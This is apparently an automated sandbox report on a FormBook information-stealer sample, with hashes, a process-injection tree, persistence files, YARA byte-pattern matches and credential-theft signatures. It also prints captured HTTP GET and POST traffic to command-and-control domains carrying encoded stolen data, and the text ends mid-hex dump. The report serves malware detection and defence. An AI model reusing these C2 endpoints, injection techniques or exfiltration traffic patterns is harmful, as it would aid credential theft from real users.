Play interactive tourEdit tour

# Analysis Report Mqbmupv_Signed_.exe

## Overview

### General Information

 Sample Name: Mqbmupv_Signed_.exe Analysis ID: 288093 MD5: 20a3b044b6d1b39051e35269e6590c0b SHA1: bc6bc3a617091a5f13dcfe134b3a55d19e8f77e6 SHA256: 2ead77594bc7d6fb376764fad896f830955a1ac70155c0f9feb42299f5c788a9 Tags: exe Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64Mqbmupv_Signed_.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)notepad.exe (PID: 344 cmdline: C:\Windows\System32\Notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)cmd.exe (PID: 6308 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)ieinstal.exe (PID: 6544 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)Mqbmnet.exe (PID: 6912 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)ieinstal.exe (PID: 2212 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)Mqbmnet.exe (PID: 5976 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)ieinstal.exe (PID: 5204 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)autochk.exe (PID: 1748 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)ipconfig.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)control.exe (PID: 4864 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Mqbm.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x87:$hotkey: \x0AHotKey=1 • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\Mqbm.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x14:$file: URL= • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\Mqbm.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x5c:$icon: IconFile= • 0x0:$url_explicit: [InternetShortcut]
SourceRuleDescriptionAuthorStrings
00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x1258:$file: URL= • 0x123c:$url_explicit: [InternetShortcut]
00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmpMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x1284:$icon: IconFile= • 0x123c:$url_explicit: [InternetShortcut]
00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x620:$file: URL= • 0x604:$url_explicit: [InternetShortcut]
00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmpMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
• 0x64c:$icon: IconFile= • 0x604:$url_explicit: [InternetShortcut]
0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
Click to see the 49 entries
SourceRuleDescriptionAuthorStrings
29.2.ieinstal.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
29.2.ieinstal.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 29.2.ieinstal.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group • 0x17539:$sqlite3step: 68 34 1C 7B E1
• 0x1764c:$sqlite3step: 68 34 1C 7B E1 • 0x17568:$sqlite3text: 68 38 2A 90 C5
• 0x1768d:$sqlite3text: 68 38 2A 90 C5 • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
• 0x176a3:$sqlite3blob: 68 53 D8 7F 8C 9.2.ieinstal.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security 9.2.ieinstal.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4 • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 7 entries

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Mqbmnet.exe Virustotal: Detection: 27% Perma Link Source: C:\Users\user\AppData\Local\Mqbmnet.exe ReversingLabs: Detection: 45%
 Multi AV Scanner detection for submitted file Show sources
 Source: Mqbmupv_Signed_.exe Virustotal: Detection: 27% Perma Link Source: Mqbmupv_Signed_.exe ReversingLabs: Detection: 45%
 Yara detected FormBook Show sources
 Source: Yara match File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 29.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 9.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Contains functionality to enumerate / list files inside a directory Show sources
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop esi Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop edi Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop edi

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49754
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1Host: www.thelocaladda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1Host: www.kingofinvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 52.58.78.16 52.58.78.16 Source: Joe Sandbox View IP Address: 162.159.129.233 162.159.129.233
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
 JA3 SSL client fingerprint seen in connection with other malware Show sources
 Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA). Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 49 79 77 4e 7a 38 41 62 75 71 78 6b 6a 4f 6b 30 52 7a 53 30 4e 65 42 46 64 67 4a 53 59 37 66 68 37 71 63 6e 32 50 62 5a 6c 65 38 49 37 31 32 78 65 48 72 55 76 4e 65 67 44 55 47 35 50 50 63 65 6d 68 47 50 63 71 54 46 37 54 65 49 45 6e 31 42 51 47 66 37 31 45 66 68 65 6e 58 75 6b 31 78 33 58 6e 67 62 53 58 62 67 79 50 75 73 52 57 78 31 4a 48 6e 4d 49 51 59 53 66 4d 5a 4e 4e 70 52 6b 75 6e 4b 6b 43 67 71 4e 31 35 36 65 57 41 75 7e 51 4d 34 59 49 65 61 76 59 31 38 6a 6f 70 4b 61 7a 61 74 57 54 71 4c 50 41 75 76 78 34 48 69 65 4c 46 4d 53 44 79 49 69 64 4f 47 31 65 79 6b 4d 55 4c 33 6d 4e 6b 70 45 31 51 71 43 36 45 59 51 4f 55 7a 54 6e 28 54 6a 5f 6f 6f 5a 45 58 30 51 39 45 56 28 52 66 76 70 77 33 61 4e 2d 36 76 77 52 72 56 51 66 75 72 4f 74 52 50 6f 66 73 6c 68 5a 67 6a 6f 5a 31 44 53 36 47 44 6f 35 39 35 37 78 76 51 32 66 42 77 32 41 47 49 37 45 70 43 54 45 32 69 7a 33 79 34 64 35 6f 55 31 2d 64 36 34 34 75 42 6a 46 67 66 67 75 79 50 36 37 6e 69 7e 56 55 68 41 47 65 39 56 42 54 72 59 41 7a 50 38 6a 74 6f 30 57 68 53 47 77 51 61 57 79 4d 72 4d 72 47 65 6a 55 51 5f 34 52 78 45 33 4c 63 54 52 51 62 64 6f 6d 6d 39 6a 47 79 6d 39 68 28 50 52 69 79 48 61 54 68 31 79 7a 61 77 33 2d 6c 42 44 56 7a 54 63 50 77 58 36 56 4d 70 70 55 75 61 65 6d 79 5f 59 73 77 74 76 64 65 4c 58 67 55 72 38 34 45 59 6a 53 41 56 37 4b 4c 68 6a 6d 55 6f 61 6b 6e 33 67 6f 6a 52 67 6d 77 6d 6b 2d 72 69 75 77 31 6f 6a 36 73 68 39 74 58 75 57 33 73 45 65 5a 37 69 32 56 71 63 67 33 7e 4b 47 55 58 57 6a 73 70 73 37 69 78 68 4b 69 74 33 72 64 56 6f 61 6e 74 49 28 43 31 5f 4b 6a 70 45 50 72 42 54 33 34 39 69 44 44 67 67 62 44 48 32 37 47 78 5a 73 48 66 31 34 65 71 33 52 44 70 69 70 54 30 58 48 51 30 31 6a 2d 6e 4b 56 72 41 54 4e 4f 4e 34 53 54 38 6b 71 64 42 62 72 79 55 42 55 53 67 6d 76 54 54 5a 6d 50 4a 36 36 54 69 31 39 37 54 41 52 50 38 42 35 75 63 68 59 6e 59 55 41 43 49 4b 45 62 32 68 43 71 7a 57 51 76 61 50 43 57 74 75 49 73 71 77 6c 77 43 41 33 70 75 48 4a 35 35 30 44 4f 50 70 32 4c 71 47 64 4a 74 73 38 57 38 5a 4c 30 46 6e 7a 70 61 76 4f 78 43 4e 54 4e 43 37 28 63 4f 61 42 39 48 68 41 4a 39 57 57 58 43 30 42 56 75 63 64 5f 42 58 6b 39 6c 35 28 78 69 6a 63 52 70 52 63 5f 4d 69 76 47 31 35 4a 4c 7a 41 6b 4c 69 33 31 35 5a 49 39 4f 67 4e 4a 77 6d 66 68 68 4d 65 45 70 72 6a 34 61 4c 6a 7a 33 66 55 67 36 4d 2d 74 73 68 55 58 7a 63 30 66 52 78 58 76 63 30 39 77 7a 38 56 6a 68 6d 6d 52 66 4e 31 52 6d 54 58 66 66 6d 66 74 55 72 61 5a 50 68 77 4c 5f 6d 58 75 48 6c 45 38 55 57 58 66 4c 6c 35 48 70 35 35 6d 71 76 45 28 67 53 53 33 49 62 56 4f 6b 3 Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6c 4d 39 56 42 76 5a 4a 67 71 72 7e 67 65 75 68 4d 58 43 63 64 42 7a 54 44 53 64 62 38 42 4f 4b 53 64 63 34 5f 77 37 79 4e 48 71 31 30 78 52 75 70 77 31 58 4b 54 76 33 74 79 64 78 48 4f 5f 65 71 71 74 61 44 4d 6b 36 47 62 74 52 74 36 66 50 32 6f 6c 62 4f 33 50 63 50 4b 35 62 69 43 2d 54 46 66 6b 28 58 75 39 56 7a 6f 6f 61 36 4c 44 4e 74 68 57 37 2d 65 47 35 34 44 55 75 35 41 6a 55 38 6e 41 58 4a 75 69 61 6e 48 68 55 59 37 65 73 65 4a 4e 78 70 69 49 6e 66 56 55 68 2d 5a 45 72 41 68 53 4a 6b 64 66 46 69 50 38 42 6b 6e 58 6a 6b 79 38 37 5a 75 4c 62 44 4c 7a 37 51 6c 62 74 70 36 4a 55 59 43 57 73 54 48 32 62 30 4e 41 59 4e 45 69 38 5f 74 45 43 74 52 4f 49 7a 39 2d 58 2d 75 46 56 4a 44 77 46 57 65 4b 6d 34 4d 76 6a 73 35 49 69 4f 79 74 30 73 66 41 66 63 61 44 70 55 39 32 31 58 74 52 4e 52 73 64 78 4f 68 62 71 33 4c 45 66 78 59 72 30 77 57 34 78 73 6b 5a 44 4f 45 45 56 37 53 73 6b 35 34 4d 65 45 64 45 4b 35 68 37 59 6d 68 62 48 52 6b 42 52 31 69 63 66 33 7e 45 32 71 45 5f 68 78 46 62 6c 45 67 4f 6c 4d 44 34 42 58 63 75 58 52 41 76 79 32 48 56 53 49 45 6e 65 67 35 68 39 59 77 48 34 39 45 33 55 30 47 67 7e 61 76 65 33 34 63 55 4c 4d 50 73 31 36 66 45 77 52 76 54 64 31 6a 6e 31 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=RHR1mlM9VBvZJgqr~geuhMXCcdBzTDSdb8BOKSdc4_w7yNHq10xRupw1XKTv3tydxHO_eqqtaDMk6GbtRt6fP2olbO3PcPK5biC-TFfk(Xu9Vzooa6LDNthW7-eG54DUu5AjU8nAXJuianHhUY7eseJNxpiInfVUh-ZErAhSJkdfFiP8BknXjky87ZuLbDLz7Qlbtp6JUYCWsTH2b0NAYNEi8_tECtROIz9-X-uFVJDwFWeKm4Mvjs5IiOyt0sfAfcaDpU921XtRNRsdxOhbq3LEfxYr0wW4xskZDOEEV7Ssk54MeEdEK5h7YmhbHRkBR1icf3~E2qE_hxFblEgOlMD4BXcuXRAvy2HVSIEneg5h9YwH49E3U0Gg~ave34cULMPs16fEwRvTd1jn1A). Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6b 55 44 5a 52 36 66 65 69 7e 75 38 77 4f 51 72 63 6e 63 4c 4e 38 70 44 68 43 6e 46 39 68 6b 4b 54 4d 30 68 75 67 54 31 75 50 71 33 33 5a 63 6a 70 77 36 66 71 54 75 6d 64 32 50 38 33 6e 79 65 72 75 44 61 44 31 79 73 77 33 6f 53 39 36 75 4f 57 74 42 4b 65 7a 59 63 4e 7e 51 62 42 7a 34 55 46 6a 6b 31 48 47 5f 61 79 35 75 64 37 48 51 41 39 39 58 35 36 61 62 35 4f 28 38 76 61 38 64 64 64 37 43 56 4f 53 70 57 48 33 4a 43 62 62 42 69 75 4e 4b 7e 49 32 58 36 73 77 54 73 62 30 78 33 56 56 52 41 30 46 42 4f 41 57 44 45 51 57 68 76 55 43 6f 37 61 50 77 42 68 50 75 28 54 41 58 76 62 66 42 4e 38 36 55 31 79 48 59 4e 48 70 78 61 4e 55 64 68 4b 52 44 55 39 38 61 50 78 30 31 49 50 47 32 59 62 6e 43 4f 45 47 79 6c 72 67 6e 72 4d 70 6e 75 70 48 74 6d 39 7e 4e 63 65 33 51 32 45 39 64 33 58 74 56 5a 78 73 4c 36 49 39 71 70 48 61 69 66 79 34 48 7e 44 43 39 79 71 6b 5a 4e 4c 5a 34 58 4c 43 65 72 74 45 65 54 6e 78 44 49 2d 68 59 64 6d 68 39 48 51 49 38 52 31 69 51 66 32 7e 2d 6b 6f 34 5f 6e 6b 4a 79 78 44 55 34 6a 4d 43 69 43 44 34 73 4d 58 73 5f 79 79 6a 56 41 4e 41 4e 65 54 5a 68 72 5a 41 45 34 5a 51 33 56 6b 47 67 34 61 75 6f 37 34 31 48 50 4f 69 52 6b 35 54 73 31 6e 65 6a 59 55 4b 66 70 62 62 71 37 52 37 35 4e 56 4d 71 77 5a 59 4c 47 2d 4e 67 76 32 69 54 64 75 4b 52 6e 69 7e 5a 4c 43 46 62 66 79 4d 30 50 5f 33 34 67 50 69 6d 45 32 76 35 4e 6b 34 57 71 6a 6a 74 6e 72 42 66 66 39 70 6d 32 48 37 42 4f 6e 31 66 30 54 50 4a 52 4c 6e 41 67 46 64 43 32 69 53 4a 54 4d 6a 31 51 47 54 38 59 44 50 30 61 4b 68 74 28 57 78 30 6f 76 72 41 69 43 58 47 42 4c 68 70 6e 7a 62 71 4b 56 65 50 36 57 72 2d 28 4e 71 69 5a 79 56 5f 38 5a 56 62 57 43 39 71 4d 69 42 65 79 5a 58 47 62 65 75 70 52 4c 38 61 44 70 59 36 4b 68 65 5a 4a 5f 49 46 42 44 35 30 64 49 63 7a 76 61 76 6e 6e 54 42 62 75 75 54 54 62 2d 39 52 32 79 65 75 61 61 49 75 5a 4d 43 70 28 48 49 57 59 56 4f 58 55 70 79 78 4f 31 4a 51 79 4e 54 7a 53 65 62 74 36 77 66 4f 58 58 42 63 77 39 7a 74 57 6d 69 6b 54 44 37 4f 6b 5f 7e 48 57 4b 34 63 78 5a 44 4d 37 52 59 37 44 35 28 72 35 47 4e 62 67 41 68 78 34 33 45 44 63 32 4e 2d 54 50 5a 49 78 47 44 59 4a 65 54 55 56 52 64 6d 6e 66 73 71 4e 37 39 7a 69 79 67 59 51 49 6e 76 70 30 55 64 41 44 36 62 45 62 59 51 59 67 6e 48 69 73 71 6e 66 38 61 74 42 53 38 51 33 4d 54 53 6e 61 33 32 42 37 68 35 75 6e 71 6b 75 5a 78 58 6a 62 32 33 6f 67 49 67 4c 44 47 56 75 72 52 67 28 46 39 34 41 77 35 52 64 37 52 5a 79 35 71 55 72 33 43 7a 63 7a 63 55 72 31 4c 35 66 49 4d 41 34 41 49 56 4a 4d 6d 70 5a 34 63 64 41 30 4b 63 53 70 6e 61 7e 59 4b 32 6f 47 71 31 72 54 2
 Source: global traffic HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1Host: www.thelocaladda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1Host: www.kingofinvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 